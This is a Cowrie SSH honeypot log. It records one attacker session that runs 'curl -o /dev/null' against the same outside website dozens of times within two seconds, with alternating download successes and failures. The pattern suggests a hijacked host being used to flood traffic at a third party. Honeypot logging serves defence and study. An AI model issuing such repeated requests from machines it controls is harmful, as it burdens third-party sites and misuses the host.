{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:53.161506Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:53.162828Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:53.217929Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:53.218932Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:53.221819Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:53.243702Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:53.258184Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:53.259161Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:53.297095Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:53.297942Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:53.336137Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:53.336724Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:53.348160Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:53.374359Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:53.375068Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:53.412508Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:53.413321Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:53.450873Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:53.451713Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:53.489374Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:53.490184Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:53.527321Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:53.528108Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:53.554999Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:53.568264Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:53.569057Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:53.615968Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:53.616910Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:53.656914Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:53.657719Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:53.695023Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:53.696252Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:53.721087Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:53.728016Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:53.758482Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:53.759549Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:53.798031Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:53.798923Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:53.836976Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:53.837901Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:53.845238Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:53.868958Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:53.876016Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:53.876915Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:53.916343Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:53.916952Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:53.958485Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:53.959335Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:53.973061Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:53.998608Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:53.999626Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:54.013165Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:54.051924Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:54.052705Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:54.057405Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:54.077574Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:54.091128Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:54.092162Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:54.097257Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:54.129099Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:54.129863Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:54.167227Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:54.168201Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:54.205506Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:54.206270Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:54.214141Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:54.244489Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:54.245224Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:54.281959Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:54.282720Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:54.322324Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:54.323221Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:54.360762Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:54.361512Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:54.398923Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:54.399461Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:54.422216Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:54.441430Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:54.458369Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:54.459161Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:54.498765Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:54.499553Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:54.501098Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:54.542551Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:54.543331Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:54.581277Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:54.581991Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:54.619303Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:54.620035Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:54.658712Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:54.659459Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:54.666134Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:54.709364Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:54.710487Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:54.748728Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:54.749495Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:54.753447Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:54.758856Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:54.772992Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:54.787511Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:54.788227Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:54.825282Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:54.825980Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:54.836590Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:54.872926Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:54.873798Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:54.911693Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
